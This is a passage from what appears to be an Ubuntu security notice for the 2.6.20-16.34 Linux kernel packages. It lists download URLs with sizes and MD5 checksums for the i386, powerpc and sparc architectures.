http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:   250128 d95f6e913380f7128821f6c7b5dd3588\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:   132536 2ec726e0c56b255856ca675c582565be\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:   133074 1da640a801c36aba904b64840a687412\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:   213350 8018b90e2791732915721120184869e7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:   220796 4c3aaff523b464dd26e214047741d1b1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:  1110420 e42be64a651baa1ec07cf7b5793a53ec\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:  1110524 a04cc23e2a0f1627bcd19ee0f4ec8c86\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:  1951334 be7a0897cc1af691a882e676179de046\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:  1974714 323d8b3d45603201e292280087bd1e46\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:   149852 b938e982b26c50685e54a71ddfbe9eeb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:   142502 f217c35c7e0f8dd8374f7ca5fe81d581\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:   160754 f2aceaddb871b3a9149ebc496740d4ec\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:   161954 4e11d0ecd7173f8500d080707c2f0935\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:   252934 6a3a035d3e628262838240fdb59579ed\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:   255512 57dc8235378ddacfde72b287c9901b86\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    32758 a946d549be3c05ae6986a91fcbf2265d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    33336 3ee608671c87fb245110138646e52ba8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    38028 faa099182354c2e28582f735d0ede15f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    38306 8d654a49806ba674778f73fbeaa0d259\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    81848 dee99778c5125ddf479770ff8c64ca21\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    82092 0f5e88328f6799d422b5487d2fb36bff\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    47690 77621576d3fc94d98d635ab517cdfc60\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    47718 846e219e80cc92e7b3f2fa76af3557f8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:     8260 fb3750e0c871ed295844c7f7241a4ce9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:     8498 93fccc7acb7a937285bfdeeddd96622b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    49952 83e3c30159a350506cd5189d7bb1c26d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    51866 33d860b297ef1def33cbb0fa5172817b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    78850 741a82d5ea4e6091a635fe30be763753\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    79494 bd0edb4edd76da1b071b023150ddb576\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:   322548 b71fab69e39da820f898cb1878ad35f8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:   322570 a7e794cfb6161a5256dca794d7e40005\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:  1362464 a9c294e1f39df7406b44849dada0005c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:  1347982 bf23b61cec28934833d04a4679588fde\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    42452 1a310e8a7646046983275db34543e5db\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    42232 523af84ac476d47d9c4fea45d68212b8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    10762 b864a85e1495855ee8ff233509c6fb57\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    11398 8a45cdc34f8c06fac6e8e91326b2b376\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    55990 d19d09fd75f8dbce605ffe928d0d8e80\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    56896 89f449de196c1a118243ddda8b2ec461\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:   360274 ee023deb6fa26448e428059797f13182\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:   363220 c1a91e2211c228253b2af991c06ebc12\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    63168 a98ee6294093b94b35cae56af4bc589a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    63820 5f6dcc61b08427b55ac502e009474b7f\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-2.6.20-16-lowlatency_2.6.20-16.34_i386.deb\n      Size/MD5: 23844834 9e0480ccd5697b4722a9acc17674daf2\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-lowlatency_2.6.20-16.34_i386.deb\n      Size/MD5: 24185156 b5d8d7b87df6d9a22349a68294e6d726\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:   328852 425e9ef86c7099ff211795eec55583f4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:   325586 53f84ffdf949bd1b09c98f4d2d291f2c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:    41182 f7dd000c829d8bcdd30623e21061c6d3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:    47456 3b397d1a8b2cc2bfcce9d083b8452e3c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:   219678 9e8926372b9689927a497ec32fdd7826\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:   239166 769515e2fc3aeb67ccfe62d709d3bed4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:    43648 85bdebc413373cb792cb6db76825c726\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:    39778 0f2244003a02e50f05cb36bf02e52da5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:   717794 5af7c3eb55b152cff526b32c33531a20\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:   776474 b6d3b6504853102e0c39b3dec975bf3e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:   205058 549486bf0b0d3ec28a0af239f575b3ea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:   209732 44377dd629f1c1db23b68a46de9fa6d0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:    59218 88eb3b3602340f8b621f7316b7619569\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:    66860 e01835dfd217fc7404fb03f9b0eb3d9a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:    64200 a0bfd643b213bd60bddf53c8929b3a8b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:    65324 188f85a306b57e039077b25ea570ff33\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:   144090 f199de239935cef855c54a7d028386a7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:   162784 b1cb94d67312e7f004c020e411f175d5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:   383354 04eaff196f60e028c316e9ce098caba3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:   251792 aac2012b70917ea7970e33de77b953f8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:  2157578 bb7951f55026cbe40039195064571cb8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:  3083390 ad3490bb8cbbaaaf453e2cfc68f2661f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc-smp_2.6.20-16.34_powerpc.deb\n      Size/MD5:   868072 e2f22f74e3636ff2c175bcc3bd1bcc8f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc64-smp_2.6.20-16.34_powerpc.deb\n      Size/MD5:   871384 558640a6583bbac1c6f1ab65c0f39105\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc_2.6.20-16.34_powerpc.deb\n      Size/MD5:   858544 78e49d6e412e0893ad05094beaed384c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.34_powerpc.deb\n      Size/MD5:  8151204 8d3062db10aa3511fc031d8c0aa13c4a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc-smp_2.6.20-16.34_powerpc.deb\n      Size/MD5: 24516556 509dbee76838cb5036f3a94daef361bd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc64-smp_2.6.20-16.34_powerpc.deb\n      Size/MD5: 26861066 06e9ce2eb22eb93eff787f79e2e04904\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc_2.6.20-16.34_powerpc.deb\n      Size/MD5: 24219098 d032a4570f09e700a2d7be17406751a0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc-smp_2.6.20-16.34_powerpc.deb\n      Size/MD5:  2128044 61226c9ccefa59b36c64cb48d4ffbd8f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc64-smp_2.6.20-16.34_powerpc.deb\n      Size/MD5:  2854452 f1e7c4af285f65c54c3f73b601aefbaa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc_2.6.20-16.34_powerpc.deb\n      Size/MD5:  2049692 c8c457931686087ceba6a31fc95e674c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.34_powerpc.deb\n      Size/MD5:   644840 caf9acd0fd0b02a3b75faf9b17d4e6d3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:   253008 a541093402f366d45304517b4fd54389\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:   295086 bb4855cec910c101c882fd9ed47b4b20\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:   155546 a67279f494b6cc4e57d6f8699677b955\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:   168438 68c42e64674977b49b7f063072facd64\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:   248332 95f9d1233f3d12615d98de47887bd57c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:   280138 fde4fda71bd171a8351363ea8648ed2a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:  1110476 e36dff54046c10d7ea0810b8139c7217\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:  1110650 3b8f5aec6dda991854dee9f9a10a4f08\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:  1951192 26d78ce2216a97f212b30c098d3d83d6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:  2253502 da1a4db59abfd92503867301db1f81e2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:   233498 1630c711abe20e5514ce51d9c7ba430a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:   223078 d3dbb9f6ecfa8b9ab6ac31a09b0d2d8a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:   172916 df35f76be2c750777b771aa674ec9e9d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:   205486 ad8055d1c3090d403cde4aaa99f8cbc8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:   280980 61801d119336f98124f068e4e77e6f93\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:   316590 b7893331e57856a0c9f65ad36b5e741d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:    44648 934d68c57b2f6d80081b9594f30540be\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:    43408 f2f2a33061e8f1fc4af8293e8af96162\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:    41210 bf293be5d7ac2b446a9e2e3057b3927d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:    53682 1c744c28d973ea3a1d88bbe155418375\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:    72810 2e746428b1426b81982339320b04cd85\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:    85288 b6afcda94e97c363b427c3ffbe06492a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:    74538 3ff2b4356cde14630a2fd95ca7426ab7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:    29714 26b174cfc25f5659d919ef7e2c377ee5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:     8396 94109c6ac7e606066b4097802318483f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:     9876 600823c7c76e8a28f765174d1d4965a1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:    56162 bd48637128ccdcf243949e1975d2eed4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:    67416 1b1033a9dd03e2fda3a0eaae7d7d2a66\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:    86634 1117abd9e041733cc146461886b6e664\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:   129210 8d9f100997eca2ea53a3e9fad77edea4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:   322556 e5a6a789a923b86878322b451934672a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:   322582 7ba8b318656b01ef0ed96f97dabc7ac3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:  1415798 5a7895fdfb2d740cfd55c8479d013d99\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:  1345398 5558d96f73b123dd4a1ea4aa9cfb4ae2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:    74222 5955d0dd72fb978d3e61b2d3cb60c0a7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:    83240 4bb8920d4fd944fe61193a7c1cfb7b26\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:    12012 52c2ae19ee5403334433fc23055b7762\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:    13942 03d4dc8b53e82decb22409036515b3ce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:    78348 1eebba88e687b86b0480c127f198d016\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:    85450 489205729e4c72ee92bd2d3c8582cd71\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:   398164 ddddfc69b52ea32f28b60a5bda049f19\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:   445180 96d05e932deeeb92ccc03031f76dc51f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:    76712 220d1579023a0ff90a692bde2e2df73c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb\n      Size/MD5:   100186 bfb2fc0e4ef1d3797e1d2c37d9e4f27e\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb\n      Size/MD5:    53732 126e088e7705b7db76c3daed4b50d404\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb\n      Size/MD5:    42158 a60d72f47f91f7c7110b44eced37ea47\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb\n      Size/MD5:   211710 8038615e08a2bcbb4a8012e81f351077\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb\n      Size/MD5:   607892 ae659c8a47bc0377e3d146d916952be9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb\n      Size/MD5:   142706 a3aefa8400d6b2e9671490c728c1c442\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb\n      Size/MD5:    51446 6c1fa11911f5260c32985c56f63bab9b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb\n      Size/MD5:    37406 c20567b9297dd44eab21877f5b9a9091\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb\n      Size/MD5:   151176 ee0be08527952eff3e2ed0a1c11f4e07\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb\n      Size/MD5:  1933148 e57d2680d62d695e68f0787f6a8184d5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-sparc64-smp_2.6.20-16.34_sparc.deb\n      Size/MD5:   780450 